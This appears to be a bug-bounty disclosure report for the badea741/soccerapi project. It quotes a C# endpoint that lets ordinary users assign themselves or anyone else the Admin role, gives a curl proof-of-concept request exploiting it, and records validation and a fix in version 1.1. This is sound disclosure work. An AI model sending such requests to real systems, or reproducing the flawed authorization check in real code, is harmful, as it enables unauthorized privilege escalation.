Normal user can set himself or any other user to admin role in badea741/soccerapi

Valid

Reported on

Sep 20th 2022

Description

Improper access to an API endpointAddUserToRole can allow a regular user to escalate his privileges to be an admin

Infected code

[Authorize(Roles = Roles.User)]
    [HttpPost]
    public async Task<IActionResult> AddUserToRole([FromQuery] string username, string role)
    {
        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }

As seen it just allows a user role to access this endpoint and no proper checks for what role can be added So it can be an admin role

Proof of Concept

curl -X 'POST' \
  'http://<SERVER>/Auth/AddUserToRole?username=<AnyUser>&role=Admin' \
  -H 'accept: */*' \
  -H 'Authorization: <TOKEN>' \
  -d ''

Impact

An attacker can escalate his privileges to be an admin in a peace of cake way.

Occurrences

AuthController.cs L67

We are processing your report and will contact the badea741/soccerapi team within 24 hours. a year ago

Aly Khaled modified the report

a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

We have contacted a member of the badea741/soccerapi team and are waiting to hear back a year ago

badea741 validated this vulnerability a year ago

Aly Khaled has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

badea741 marked this as fixed in 1.1 with commit 2a06fc a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

AuthController.cs#L67 has been validated

to join this conversation